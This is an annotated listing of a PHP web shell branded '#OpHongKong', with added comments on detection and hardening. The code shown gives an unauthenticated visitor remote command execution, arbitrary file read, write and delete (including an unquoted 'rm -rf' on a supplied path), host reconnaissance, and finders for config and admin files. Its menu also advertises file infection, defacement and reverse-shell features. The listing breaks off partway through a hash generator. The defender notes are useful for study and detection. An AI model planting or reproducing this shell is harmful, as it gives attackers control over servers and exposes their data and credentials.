OpHK

shell.php

Oct 7th, 2014
  1. <!---
  2. # Official shell of #OpHongKong
  3. # Shell By - @t3chfl4r3
  4. #
  5. #
  6. #
  7. --->
  8.  
  9. <title>~ #OpHongKong ~</title>
  10. <link rel="shortcut icon" type="image/png" href="http://tinyurl.com/nvd8n8g"/>
  11.  
  12. <?php
  13.  
  // Runtime setup. Every call below is @-suppressed and error_reporting(0) follows, so
  // nothing in this script surfaces as a PHP error in the response. Memory and upload
  // limits are raised to 9999M/9999m and the execution time limit is set to 0 (no limit).
  // Detection: this cluster of ini_set()/set_time_limit(0)/error_reporting(0) calls at the
  // top of a PHP file under a web root is worth flagging in static scans.
  14. @ini_set("memory_limit", "9999M");
  15. @ini_set("max_execution_time", "0");
  16. @ini_set("upload_max_filesize", "9999m");
  17. @ini_set("magic_quotes_gpc", "0");
  18. @set_magic_quotes_runtime(0);
  19. @set_time_limit(0);
  20. error_reporting(0);
  21.  
  22. //Style Variables
  23. $fontcolor = "FF0000";
  24. $fontsize = "12px";
  25. $fontfamily = "courier";
  26. $fontweight = "normal";
  27. $tablebordercolor = "#000000";
  28. $tablebgcolor = "#000000";
  29. $tablehovercolor = "#141414";
  30. $textareabgcolor = "#000000";
  31. $textareafontcolor = "#FF0000";
  32. $textareabordercolor = "#FF0000";
  33. $inputbgcolor = "#000000";
  34. $inputfontcolor = "#FF0000";
  35. $inputbordercolor = "#FF0000";
  36. $linkcolor = "#FFFFFF";
  37. $activelinkcolor = "#FF0000";
  38. $hoverlinkcolor = "#FF0000";
  39. $visitedlinkcolor = "#FFFFFF";
  40. $contentpadding = "10px";
  41. $containerbordercolor = "#FF0000";
  42.  
  43. //Other Variables
  // Host reconnaissance, gathered on every request and rendered in the system bar table
  // further down: requester IP, effective user of the PHP process (posix_getpwuid(), or a
  // `whoami` child process when that function is unavailable), php_uname(), server
  // software, PHP version, and the safe_mode / open_basedir / disable_functions settings.
  // $syscoms is the list of command-execution functions that can_exe() compares against
  // disable_functions. Hardening note: can_exe() only answers "cannot execute" when all
  // five names are disabled, so a partial disable_functions list does not change its answer.
  44. $version = "#OpHongKong";
  45. $yourip = $_SERVER['REMOTE_ADDR'];
  46. $whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exe_cmd("whoami");
  47. $whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exe_cmd("whoami");
  48. $uname = php_uname();
  49. $serversoftware = $_SERVER['SERVER_SOFTWARE'];
  50. $gatewayinterface = $_SERVER['GATEWAY_INTERFACE'];
  51. $servername = $_SERVER['SERVER_NAME'];
  52. $serverip = $_SERVER['SERVER_ADDR'];
  53. $safemode = ini_get('safe_mode') ? "Enabled" : "Disabled";
  54. $openbasedir = ini_get('open_basedir') ? "Enabled" : "Disabled";
  55. $disabledfunc = ini_get('disable_functions');
  56. $phpversion = phpversion();
  57. $domain = $_SERVER['HTTP_HOST'];
  58. $rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
  59. $syscoms = array('system', 'shell_exec', 'proc_open', 'passthru', 'exec');
  60. $compression = array('zip', 'tar', 'tar.gz', 'tgz', 'gz', 'rar');
  61.  
  62. $bcpl = "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";
  63. $bcpy = "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";
  64.  
  65. //Tab Options Layout
  // Menu definition. Each entry maps a label to this script's own file name plus a bare
  // query-string key; the handlers further down test those keys with isset($_GET[...]).
  // Log-hunting note: the file name comes from basename(__FILE__) and changes if the file
  // is renamed, but the keys are fixed literals. Requests to a single PHP file carrying
  // value-less keys such as ?fileInfect, ?fileDeface, ?bcPHP, ?bcPerl, ?bcPython,
  // ?configFinder or ?adminFinder are a usable access-log indicator for this script.
  66. $currentfile = basename(__FILE__);
  67. $tabs = array(
  68. "System"=> array(
  69. "CPU" => "./".$currentfile."?cpu",
  70. "Users" => "./".$currentfile."?users",
  71. "Memory" => "./".$currentfile."?memory",
  72. "Processes" => "./".$currentfile."?processes"
  73. ),
  74. "Mass Editor" => array(
  75. "Infect Files" => "./".$currentfile."?fileInfect",
  76. "Deface Files" => "./".$currentfile."?fileDeface"
  77. ),
  78. "Back Connect" => array(
  79. "PHP" => "./".$currentfile."?bcPHP",
  80. "Perl" => "./".$currentfile."?bcPerl",
  81. "Python" => "./".$currentfile."?bcPython"
  82. ),
  83. "Shell" => array(
  84. "Kill" => "./".$currentfile."?kill",
  85. "Credits" => "./".$currentfile."?credits",
  86. "Check Links" => "./".$currentfile."?checkLinks"
  87. ),
  88. "Extras" => array(
  89. "Reverse IP" => "./".$currentfile."?reverseIP",
  90. "Hash Generator" => "./".$currentfile."?hashGenerator"
  91. ),
  92. "Search" => array(
  93. "Admin Finder" => "./".$currentfile."?adminFinder",
  94. "Config Finder" => "./".$currentfile."?configFinder",
  95. "Search Files/Dir" => "./".$currentfile."?search"
  96. )
  97. );
  98.  
  // External resources referenced by the page. In the code visible here they are emitted
  // as <link>/<script>/CSS url() values, so they are fetched by the operator's browser and
  // not by the server -- they will not appear in the server's outbound traffic from this
  // code path. The URLs and MD5 strings are fixed literals and therefore usable as static
  // content signatures. The "MD5" fields are presumably expected checksums used by the
  // ?checkLinks feature; that handler is not in the visible portion -- confirm there.
  99. $links = array(
  100. "BOOTSTRAPCSS" => array(
  101. "LINK" => "http://dl.dropboxusercontent.com/s/mzs89eukbo0apxz/bootstrap_navbar.css",
  102. "MD5" => "5ed756c76e52bcf521040ff09a01f3f3",
  103. "DESC" => "Bootstrap Nav Bar CSS"
  104. ),
  105. "BOOTSTRAPJS" => array(
  106. "LINK" => "http://dl.dropboxusercontent.com/s/ogxuaa6ccn0itgd/bootstrap-dropdown.js",
  107. "MD5" => "be4478613ae8c0bb1b799e6b340519e4",
  108. "DESC" => "Bootstrap Dropdown JS"
  109. ),
  110. "BACKGROUND" => array(
  111. "LINK" => "https://pbs.twimg.com/profile_images/1773564270/anonymous-logo-1.jpg",
  112. "MD5" => "bb87b9287906b2cde47fd18680e4f00d",
  113. "DESC" => "Background Image"
  114. )
  115. );
  116.  
  // The `dir` query parameter is taken as-is (only slash-normalised by CleanDir) and
  // becomes the working directory that exe_cmd() chdir()s into. There is no allow-list and
  // no confinement to the document root, so the value can name any path the PHP process
  // can enter. When the parameter is absent or empty the current working directory is used.
  117. if(!@$_GET['dir']) {
  118. $dir = CleanDir(getcwd());
  119. } else {
  120. $dir = CleanDir($_GET['dir']);
  121. }
  122.  
  /**
   * Normalises a path string: backslashes become forward slashes, then each "//" is
   * replaced by "/" in a single pass.
   * This is cosmetic only -- ".." segments are left untouched and nothing is resolved
   * against a base directory, so it provides no path confinement.
   */
  123. function CleanDir($directory) {
  124. $directory = str_replace("\\", "/", $directory);
  125. $directory = str_replace("//", "/", $directory);
  126. return $directory;
  127. }
  128.  
  /**
   * Formats a byte count as a human-readable string using 1024-based units
   * (B, KB, MB, GB, TB). $precision is the number of decimals passed to round().
   * Negative input falls through to the final else and is returned unchanged with a
   * " B" suffix.
   */
  129. function ByteConversion($bytes, $precision = 2) {
  130. $kilobyte = 1024;
  131. $megabyte = $kilobyte * 1024;
  132. $gigabyte = $megabyte * 1024;
  133. $terabyte = $gigabyte * 1024;
  134.  
  135. if (($bytes >= 0) && ($bytes < $kilobyte)) {
  136. return $bytes . ' B';
  137. } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
  138. return round($bytes / $kilobyte, $precision) . ' KB';
  139. } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
  140. return round($bytes / $megabyte, $precision) . ' MB';
  141. } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
  142. return round($bytes / $gigabyte, $precision) . ' GB';
  143. } elseif ($bytes >= $terabyte) {
  144. return round($bytes / $terabyte, $precision) . ' TB';
  145. } else {
  146. return $bytes . ' B';
  147. }
  148. }
  149.  
  // Prints $message as a centred green banner. The message is interpolated into the HTML
  // without escaping, and at least one caller (the rename handler) passes request-derived text.
  150. function success($message) {
  151. echo "<center><font color='green' size='5'><b>$message</b></font></center>";
  152. }
  153.  
  // Prints $message as a centred red banner. The message is interpolated into the HTML
  // without escaping; the infect and deface handlers pass a request-supplied directory name.
  154. function error($message) {
  155. echo "<center><font color='red' size='5'><b>$message</b></font></center>";
  156. }
  157.  
  // Emits an inline <script> that sets window.location to $url. This is a client-side
  // redirect only (no Location header), and $url is placed inside the JavaScript string
  // literal without escaping. extract_file() calls it with a request-supplied path.
  158. function redirect($url) {
  159. echo "<script>window.location = '$url';</script>";
  160. }
  161.  
  /**
   * Recursively walks $mass_dir and returns a flat array of paths.
   * With $justdirs false the result holds files; with $justdirs true it holds directories.
   * Entries whose name starts with "." are skipped (this also covers "." and "..").
   * If opendir() fails the function falls off the end and returns null.
   *
   * The search, config/admin finder, infect and deface handlers all iterate over this
   * result, so a single request can touch every non-hidden file under the chosen root.
   * Defender view: expect a burst of directory reads by the web-server account.
   */
  162. function mass_files($mass_dir, $justdirs) {
  163. if($dh = opendir($mass_dir)) {
  164. $files = array();
  165. $inner_files = array();
  166. while($file = readdir($dh)) {
  167. if($file != "." && $file != ".." && $file[0] != '.') {
  168. if(is_dir($mass_dir . "/" . $file)) {
  169. $inner_files = mass_files("$mass_dir/$file", $justdirs);
  170. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  171. if($justdirs) { array_push($files, "$mass_dir/$file"); }
  172. } else {
  173. if(!$justdirs) { array_push($files, "$mass_dir/$file"); }
  174. }
  175. }
  176. }
  177. closedir($dh);
  178. return $files;
  179. }
  180. }
  181.  
  /**
   * Reports whether at least one function named in the global $syscoms list is missing
   * from the disable_functions setting. Returns false only when every name is listed.
   * Side effect: replaces the global $disabledfunc string with the exploded array.
   * function_exists() is not consulted here; exe_cmd() performs that check separately.
   *
   * Hardening note: because one remaining function is enough for a true result, a
   * disable_functions list has to cover all of $syscoms to change this answer.
   */
  182. function can_exe() {
  183. global $disabledfunc;
  184. global $syscoms;
  185. $disabledfunc = explode(",", str_replace(' ', '', $disabledfunc));
  186. if(count(array_intersect($syscoms, $disabledfunc)) == count($syscoms)) {
  187. return false;
  188. } else {
  189. return true;
  190. }
  191. }
  192.  
  /**
   * Runs $command as an operating-system command after chdir() into the global $dir
   * (request-controlled through the `dir` parameter). The branches are tried in the
   * order proc_open, system, exec, shell_exec, passthru.
   * Only the proc_open branch captures stdout and stderr and HTML-escapes them; the other
   * branches return whatever the respective PHP function returns.
   *
   * Detection: every command becomes a child of the web-server / PHP worker process. In
   * the visible code the callers run whoami, uname -a, id, unzip, tar, gunzip, unrar,
   * rm -rf, perl /tmp/bc.pl and python /tmp/bc.py, plus whatever line is read from the
   * back-connect socket. Process-creation telemetry with the PHP worker as parent is the
   * primary place to catch this.
   */
  193. function exe_cmd($command) {
  194. global $dir;
  195. chdir($dir);
  196. if(function_exists('proc_open')) {
  197. $execute = proc_open($command, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
  198. $result = "";
  199. while (!feof($io[1])) {
  200. $result .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
  201. }
  202. while (!feof($io[2])) {
  203. $result .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
  204. }
  205. fclose($io[1]);
  206. fclose($io[2]);
  207. proc_close($execute);
  208. return $result;
  209. } elseif(function_exists('system')) {
  210. $result = system($command);
  211. return $result;
  212. } elseif(function_exists('exec')) {
  213. $result = exec($command);
  214. return $result;
  215. } elseif(functions_exists('shell_exec')) {
  216. $result = shell_exec($command);
  217. return $result;
  218. } elseif(function_exists('passthru')) {
  219. $result = passthru($command);
  220. return $result;
  221. }
  222. }
  223.  
  /**
   * Returns a string of $length characters drawn from a fixed 61-symbol alphabet
   * (a-z, A-Z and 1-9; "0" is not in the list), one array_rand() pick per character.
   * array_rand() is not a cryptographically secure source, so the output should not be
   * treated as unpredictable. The callers in this file pass $length as a numeric string.
   */
  224. function salt_gen($length) {
  225. $characters = array("a","A","b","B","c","C","d","D","e","E","f","F","g","G","h","H","i","I","j","J","k","K","l","L","m","M","n","N","o","O","p","P","q","Q","r","R","s","S","t","T","u","U","v","V","w","W","x","X","y","Y","z","Z","1","2","3","4","5","6","7","8","9");
  226. $i = 0;
  227. $salt = "";
  228. while($i < $length) {
  229. $arrand = array_rand($characters, 1);
  230. $salt .= $characters[$arrand];
  231. $i++;
  232. }
  233. return $salt;
  234. }
  235.  
  /**
   * Unpacks the archive at $filepath into $extractpath; $type selects zip, tar, gz, tgz
   * or rar. Each branch first tries a PHP class or extension (ZipArchive, PharData, zlib,
   * RarArchive) and otherwise, when can_exe() allows it, builds a shell command (unzip,
   * tar, gunzip, unrar) by interpolating both paths unquoted and hands it to exe_cmd().
   * The tar and tgz PharData branches unlink() the source archive afterwards, and the tgz
   * shell fallback appends `rm` for it.
   * At the only call site visible here all three arguments come straight from $_GET, and
   * the paths are also echoed into the page without escaping.
   *
   * Detection: archive tools spawned by the PHP worker, and bursts of newly created files
   * owned by the web-server account under whatever directory was named.
   */
  236. function extract_file($filepath, $extractpath, $type) {
  237. if($type == 'zip') {
  238. if(class_exists('ZipArchive')) {
  239. $newzip = new ZipArchive;
  240. $open = $newzip->open($filepath);
  241. if($open == true) {
  242. $newzip->extractTo($extractpath);
  243. $newzip->close();
  244. redirect("?dir=$extractpath");
  245. } else {
  246. error('Failed to open zip archive!');
  247. }
  248. } else {
  249. if(can_exe()) {
  250. error('ZipArchive class does not exist!<br>Trying to extract via sys commands');
  251. echo "<center>
  252. The response from 'unzip $filepath -d $extractpath' was:<br>
  253. <textarea rows='10' cols='85' readonly>".exe_cmd("unzip $filepath -d $extractpath")."</textarea>
  254. </center>";
  255. } else {
  256. error('Zip archive does not exist and commands can not be executed!');
  257. }
  258. }
  259. } elseif($type == 'tar') {
  260. if(class_exists('PharData')) {
  261. $newphar = new PharData($filepath);
  262. $newphar->extractTo($extractpath);
  263. unlink($filepath);
  264. redirect("?dir=$extractpath");
  265. } else {
  266. if(can_exe()) {
  267. error('PharData class does not exist!<br>Trying to extract via sys commands');
  268. echo "<center>
  269. The response from 'tar xvf $filepath -C $extractpath' was:<br>
  270. <textarea rows='10' cols='85' readonly>".exe_cmd("tar xvf $filepath -C $extractpath")."</textarea>
  271. </center>";
  272. } else {
  273. error('PharData class does not exist and commands can not be executed!');
  274. }
  275. }
  276. } elseif($type == 'gz') {
  277. if(function_exists('gzopen')) {
  278. $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME));
  279. $open = gzopen($filepath, "rb");
  280.  
  281. while($contents = gzread($open, 4096)) {
  282. file_put_contents($decomname, $contents, FILE_APPEND);
  283. }
  284. gzclose($open);
  285. redirect("?dir=$extractpath");
  286. } else {
  287. if(can_exe()) {
  288. $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME));
  289. error('Zlib does not seem to be enabled!<br>Trying to extract via sys commands.');
  290. echo "<center>
  291. The response from 'gunzip -c $filepath > $decomname' was:<br>
  292. <textarea rows='10' cols='85' readonly>".exe_cmd("gunzip -c $filepath > $decomname")."</textarea>
  293. </center>";
  294. } else {
  295. error('Zlib does not seem to be enabled and commands can not be executed!');
  296. }
  297. }
  298. } elseif($type == 'tgz') {
  299. if(class_exists('PharData')) {
  300. $newphar = new PharData($filepath);
  301. $newphar->decompress();
  302.  
  303. $newphar = new PharData(str_replace(".tgz", ".tar", $filepath));
  304. $newphar->extractTo($extractpath);
  305. unlink($filepath);
  306. unlink(str_replace(".tgz", ".tar", $filepath));
  307. redirect("?dir=$extractpath");
  308. } else {
  309. if(can_exe()) {
  310. error('PharData class does not exist!<br>Trying to extract via sys commands.');
  311. echo "<center>
  312. The response from 'tar xvfz $filepath -C $extractpath && rm $filepath' was:<br>
  313. <textarea rows='10' cols='85' readonly>".exe_cmd("tar xvfz $filepath -C $extractpath && rm $filepath")."</textarea>
  314. </center>";
  315. } else {
  316. error('PharData class does not exist and commands can not be executed!');
  317. }
  318. }
  319. } elseif($type == 'rar') {
  320. if(class_exists('RarArchive')) {
  321. $openrar = RarArchive::open($filepath);
  322.  
  323. if($raropen == true) {
  324. $entries = $openrar->getEntries();
  325. foreach($entries as $files) {
  326. $files->extract($extractpath);
  327. }
  328. $openrar->close();
  329. } else {
  330. error('Failed to open rar file!');
  331. $openrar->close();
  332. }
  333. } else {
  334. if(can_exe()) {
  335. error('RarArchive class does not exist!<br>Trying to extract via sys commands.');
  336. echo "<center>
  337. The response from 'unrar x $filepath $extractpath' was:<br>
  338. <textarea rows='10' cols='85' readonly>".exe_cmd("unrar x $filepath $extractpath")."</textarea>
  339. </center>";
  340. } else {
  341. error('RarArchive class does not exist and commands can not be executed!');
  342. }
  343. }
  344. }
  345. }
  346.  
  347. //Initialize StyleSheet
  348. echo "
  349. <link rel='stylesheet' href='".$links['BOOTSTRAPCSS']['LINK']."'>
  350. <script src='//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js'></script>
  351. <script src='".$links['BOOTSTRAPJS']['LINK']."'></script>
  352. <style>
  353. body {
  354. background: #141414 url('".$links['BACKGROUND']['LINK']."');
  355. color: $fontcolor;
  356. padding-top: 100px !important;
  357. margin:0;
  358. font-family:$fontfamily;
  359. font-size:$fontsize;
  360. font-weight:$fontweight;
  361. background-size: 50%;
  362. }
  363. #container {
  364. width: 500px;
  365. border-color: $containerboredercolor;
  366. margin-left: auto;
  367. margin-right: auto;
  368. }
  369. #content {
  370. background-color: black;
  371. border: 1px solid #000000;
  372. padding: $contentpadding;
  373. }
  374. #container1 {
  375. width: 250px;
  376. border-color: $containerboredercolor;
  377. margin-left: auto;
  378. margin-right: auto;
  379. }
  380. #content1 {
  381. background-color: black;
  382. border-color: #FF0000;
  383. border: 1px solid #000000;
  384. padding: 5px;
  385. }
  386. table{
  387. border-color: $tablebordercolor;
  388. background-color: $tablebgcolor;
  389. opacity: 0.9;
  390. }
  391. #hover tr:hover{
  392. background-color: $tablehovercolor;
  393. }
  394. textarea {
  395. background-color: $textareabgcolor;
  396. resize:none;
  397. color: $textareafontcolor;
  398. border-color: $textareabordercolor;
  399. outline: none;
  400. }
  401. input {
  402. background-color: $inputbgcolor;
  403. resize:none;
  404. color: $inputfontcolor;
  405. border-color: $inputbordercolor;
  406. outline: none;
  407. }
  408. a:link {color: $linkcolor; text-decoration: none; }
  409. a:active {color: $activelinkcolor; text-decoration: none; }
  410. a:visited {color: $visitedlinkcolor; text-decoration: none; }
  411. a:hover {color: $hoverlinkcolor; text-decoration: none; }
  412. </style>";
  413.  
  414. //Let's display nav bar
  415. echo <<<html
  416. <script>
  417. $(window).load(function(){
  418. $('#topbar').dropdown();
  419. });
  420. </script>
  421. <div class="topbar" id="topbar">
  422. <div class="fill">
  423. <div class="container">
  424. <a class="brand" href="./$currentfile">Home</a>
  425. <ul class="nav">
  426. html;
  427. foreach($tabs as $title => $link) {
  428. if(is_array($link)) {
  429. echo '<li class="menu">
  430. <a href="#" class="menu">'.$title.'</a>
  431. <ul class="menu-dropdown">';
  432. foreach($link as $dtitle => $dlink) {
  433. echo "<li><a href='$dlink'>$dtitle</a></li>";
  434. }
  435. echo "</ul>";
  436. } else {
  437. echo "<li><a href='$link'>$title</a></li>";
  438. }
  439. }
  440. echo <<<html
  441. </ul>
  442. </div>
  443. </div>
  444. </div>
  445. html;
  446.  
  447. //#OpHongKong Banner
  // Fixed banner text. Together with the <title> at the top of the file it is a stable
  // literal, usable as a content signature when scanning web roots or response bodies.
  448. echo "<center>
  449. <span><font color='#FF0000' size='35'><b>Official #OpHongKong Shell</b></font></span>
  450. <br>
  451. <br>
  452. <br>
  453. <center>";
  454.  
  455. //Let's display system bar
  // Renders the reconnaissance values collected at the top of the file into one table:
  // requester IP, process user, uname, server software, gateway interface, PHP version,
  // server name and IP, safe_mode, open_basedir, and a count of disabled functions that
  // links to ?disabledFunctions. The values are interpolated without HTML escaping.
  456. if(empty($disabledfunc)) {
  457. $disabledfun = "None";
  458. } else {
  459. $count = count(explode(",", $disabledfunc));
  460. $disabledfun = "<a href='?disabledFunctions'>$count functions disabled</a>";
  461. }
  462. echo <<<html
  463. <table width="75%" border="1">
  464. <tr>
  465. <th>Your IP</th>
  466. <th>User</th>
  467. <th>System</th>
  468. <th>Server Software</th>
  469. <th>Gateway Interface</th>
  470. <th>PHP Version</th>
  471. <th>Server Name</th>
  472. <th>Server IP</th>
  473. <th>safe_mode</th>
  474. <th>open_basedir</th>
  475. <th>Disabled Functions</th>
  476. </tr>
  477. <tr>
  478. <td>$yourip</td>
  479. <td>$whoami</td>
  480. <td>$uname</td>
  481. <td>$serversoftware</td>
  482. <td>$gatewayinterface</td>
  483. <td>$phpversion</td>
  484. <td>$servername</td>
  485. <td>$serverip</td>
  486. <td>$safemode</td>
  487. <td>$openbasedir</td>
  488. <td>$disabledfun</td>
  489. </tr>
  490. </table><br><br>
  491. html;
  492.  
  493. //Read & Edit File
  // DEFENDER NOTE: arbitrary file read, write and delete. The `edit`, `delF` and `delD`
  // query parameters are used directly as filesystem paths. No authentication, path
  // restriction or request token appears in the portion of the file visible here, so any
  // client that can reach the script acts with the web-server account's file permissions.
  // `delD` is additionally interpolated unquoted into `rm -rf` and run through exe_cmd();
  // rmdir() is used only when can_exe() reports that commands cannot be run.
  // Detection: access-log entries carrying edit=, delF= or delD= with filesystem paths;
  // file-integrity alerts on writes or deletions by the web-server account; `rm` spawned
  // by the PHP worker.
  494. if(isset($_POST['save_file'])) {
  495. $file = $_GET['edit'];
  496. $newcontent = $_POST['edit_file'];
  497. if(get_magic_quotes_gpc()) {
  498. $newcontent = stripslashes($newcontent);
  499. }
  500. if(file_put_contents($file, $newcontent)) {
  501. success("File has been saved successfully!");
  502. } else {
  503. error("File was not saved successfully!");
  504. }
  505. }
  506. if(isset($_POST['delete_file'])) {
  507. $file = $_GET['edit'];
  508. if(unlink($file)) {
  509. success("File was successfully deleted!");
  510. } else {
  511. error("File could not be deleted successfully!");
  512. }
  513. }
  514.  
  515. if(isset($_GET['delF'])) {
  516. $file = $_GET['delF'];
  517. if(unlink($file)) {
  518. success("File was successfully deleted!");
  519. } else {
  520. error("File could not be deleted successfully!");
  521. }
  522. }
  523.  
  524. if(isset($_GET['delD'])) {
  525. $ddir = $_GET['delD'];
  526. if(can_exe()) {
  527. echo "<center>
  528. The response from 'rm -rf $ddir' was:<br>
  529. <textarea cols='120' rows='20'>".exe_cmd("rm -rf $ddir")."</textarea>
  530. </center>";
  531. } else {
  532. if(rmdir($ddir)) {
  533. success("Directory successfully deleted!");
  534. } else {
  535. error("Failed to delete directory!");
  536. }
  537. }
  538. }
  539.  
  540. if(isset($_GET['edit'])) {
  541. $file = $_GET['edit'];
  542. if(file_exists($file)) {
  543. $content = htmlspecialchars(file_get_contents($file));
  544. if(!is_writeable($file)) {
  545. echo "<center>
  546. <font color='red' size=5>This file is read only!</font><br>
  547. <textarea cols='120' rows='25' name='edit_file' readonly >$content</textarea>
  548. </center>";
  549. } else {
  550. echo "<center>
  551. <form action='' method='post'>
  552. <textarea cols='120' rows='25' name='edit_file'>$content</textarea><br>
  553. <input type='submit' name='save_file' value='Save'>
  554. <input type='submit' name='delete_file' value='Delete'>
  555. </form>
  556. </center>";
  557. }
  558. } else {
  559. error("File does not exist!");
  560. }
  561. }
  562.  
  563. //Rename File
  // The old name and directory come from the `rename` and `rdir` query parameters and the
  // new name from the posted `new_name` field; all three are joined into paths and passed
  // to rename() unchecked, so the operation is not limited to one directory.
  // The old name is also echoed into the form's value attribute without escaping.
  564. if(isset($_POST['rename'])) {
  565. $newname = $_POST['new_name'];
  566. $oldname = $_GET['rename'];
  567. $rdir = $_GET['rdir'];
  568. if(rename("$rdir/$oldname", "$rdir/$newname")) {
  569. success("File was successfully renamed to: $newname");
  570. } else {
  571. error("File was not renamed!");
  572. }
  573. }
  574.  
  575. if(isset($_GET['rename'])) {
  576. $oldname = $_GET['rename'];
  577. echo "<center>
  578. <form action='' method='post'>
  579. Rename: <input type='text' name='new_name' value='$oldname'>
  580. <input type='submit' name='rename' value='rename'>
  581. </form>
  582. </center>";
  583. }
  584.  
  585. //Search Files and Directories
  // Recursive name search. The posted directory is walked twice with mass_files() (files,
  // then directories) and each base name is matched against the posted value, which is
  // concatenated between "/" delimiters and used as a regular expression as-is.
  // Matches are printed as links back into the ?edit= and ?dir= handlers.
  // Defender view: two full recursive directory walks per request by the web-server account.
  586. if(isset($_GET['search'])) {
  587. echo "<center>
  588. <form action='' method='post'>
  589. Search for value in file and directory names.<br>
  590. Directory to search in: <input type='text' name='search_dir' value='$dir'><br>
  591. Value to search for: <input type='text' name='search_val'><br>
  592. <input type='submit' name='search' value='Search'>
  593. </form>
  594. </center>";
  595. }
  596. if(isset($_POST['search'])) {
  597. $searchdir = $_POST['search_dir'];
  598. $searchval = $_POST['search_val'];
  599. echo "Search results that contain '$searchval' in file names.<br>";
  600. foreach(mass_files($searchdir, false) as $key => $filename) {
  601. $basename = pathinfo($filename, PATHINFO_BASENAME);
  602. if(preg_match('/'.$searchval.'/', $basename)) {
  603. echo "<a href='?edit=$filename'>$filename</a><br>";
  604. }
  605. }
  606. echo "<br>Search results that contain '$searchval' in directory names.<br>";
  607. foreach(mass_files($searchdir, true) as $key => $dirname) {
  608. $basename = pathinfo($dirname, PATHINFO_BASENAME);
  609. if(preg_match('/'.$searchval.'/', $basename)) {
  610. echo "<a href='?dir=$dirname'>$dirname</a><br>";
  611. }
  612. }
  613. }
  614.  
  615. //Config Finder
  // Lists every file and directory under the document root whose base name contains
  // "config" and links each one to the ?edit= viewer above.
  // Incident response: application configuration files typically hold database and API
  // credentials. If this script is found on a host, treat secrets stored in any file it
  // could list here as exposed and rotate them.
  616. if(isset($_GET['configFinder'])) {
  617. echo "Search results that contain 'config' in file names.<br>";
  618. foreach(mass_files($rootdir, false) as $key => $filename) {
  619. $basename = pathinfo($filename, PATHINFO_BASENAME);
  620. if(preg_match('/config/', $basename)) {
  621. echo "<a href='?edit=$filename'>$filename</a><br>";
  622. }
  623. }
  624. echo "<br>Search results that contain 'config' in directory names.<br>";
  625. foreach(mass_files($rootdir, true) as $key => $filename) {
  626. $basename = pathinfo($filename, PATHINFO_BASENAME);
  627. if(preg_match('/config/', $basename)) {
  628. echo "<a href='?edit=$filename'>$filename</a><br>";
  629. }
  630. }
  631. }
  632.  
  633. //Admin Finder
  // Same walk as the config finder, matching "admin" in directory names first and file
  // names second, again limited to the document root. Both lists link to ?edit=, including
  // the directory matches.
  634. if(isset($_GET['adminFinder'])) {
  635. echo "Search results that contain 'admin' in directory names.<br>";
  636. foreach(mass_files($rootdir, true) as $key => $filename) {
  637. $basename = pathinfo($filename, PATHINFO_BASENAME);
  638. if(preg_match('/admin/', $basename)) {
  639. echo "<a href='?edit=$filename'>$filename</a><br>";
  640. }
  641. }
  642. echo "<br>Search results that contain 'admin' in file names.<br>";
  643. foreach(mass_files($rootdir, false) as $key => $filename) {
  644. $basename = pathinfo($filename, PATHINFO_BASENAME);
  645. if(preg_match('/admin/', $basename)) {
  646. echo "<a href='?edit=$filename'>$filename</a><br>";
  647. }
  648. }
  649. }
  650.  
  651. //Reverse IP
  // Only prints a form whose action is a third-party lookup site; the submission goes from
  // the operator's browser to that site, and no server-side request is made by this block.
  // The form markup, including its attribute spelling, is a fixed literal usable as a
  // static content signature.
  652. if(isset($_GET['reverseIP'])) {
  653. echo "<center>
  654. <form action='http://www.my-ip-neighbors.com/' method='post'>
  655. <div id='container1'>
  656. <div id='content1'>
  657. Domain Name or IP Address:
  658. </div>
  659. </div>
  660. <input type='text' size='50' name='domain' vlue='".$_SERVER['SERVER_ADDR']."' />
  661. <input type='submit' name='submit' value='Search' />
  662. </form>
  663. </center>";
  664. }
  665.  
  666. //Hash Generator
  // Hashes one posted string in the formats named in the output labels: plain and nested
  // MD5/SHA-1, plus salted MD5 layouts labelled Joomla, osCommerce, vBulletin, MyBB and IPB,
  // with salts from salt_gen(). It touches no files and runs no commands.
  // Hardening note: every scheme listed is a fast MD5/SHA-1 construction. Applications that
  // still store passwords in one of these layouts should migrate to a slow, salted
  // password hash (in PHP, password_hash() / password_verify()).
  667. if(isset($_GET['hashGenerator'])) {
  668. echo "<center>
  669. <form action='' method='post'>
  670. String to hash:<br>
  671. <input type='text' name='string'>
  672. <input type='submit' name='generate_hashes' value='Hash'>
  673. </form>
  674. </center>";
  675. }
  676. if(isset($_POST['generate_hashes'])) {
  677. $string = $_POST['string'];
  678. $md5 = md5($string);
  679. $md52 = md5(md5($string));
  680. $md53 = md5(md5(md5($string)));
  681. $sha1 = sha1($string);
  682. $sha12 = sha1(sha1($string));
  683. $sha13 = sha1(sha1(sha1($string)));
  684. $joomlasalt = salt_gen("4");
  685. $joomlahash = md5($string.$joomlasalt);
  686. $oscommsalt = salt_gen("2");
  687. $oscommhash = md5($oscommsalt.$string);
  688. $vbsalt = salt_gen("3");
  689. $vbhash = md5(md5($string).$vbsalt);
  690. $vbsalt2 = salt_gen("30");
  691. $vbhash2 = md5(md5($string).$vbsalt2);
  692. $mybbsalt = salt_gen("8");
  693. $mybbhash = md5(md5($mybbsalt).md5($string));
  694. $mybbsalt2 = salt_gen("8");
  695. $mybbhash2 = md5(md5($mybbsalt2).$string);
  696. $ipbsalt = salt_gen("5");
  697. $ipbhash = md5(md5($ipbsalt).md5($string));
  698. echo "<center>
  699. <textarea cols='120' rows='25' readonly>";
  700. echo 'md5($pass): '.$md5."\n";
  701. echo 'md5(md5($pass)): '.$md52."\n";
  702. echo 'md5(md5(md5($pass))): '.$md53."\n";
  703. echo 'sha1($pass): '.$sha1."\n";
  704. echo 'sha1(sha1($pass)): '.$sha12."\n";
  705. echo 'sha1(sha1(sha1($pass))): '.$sha13."\n";
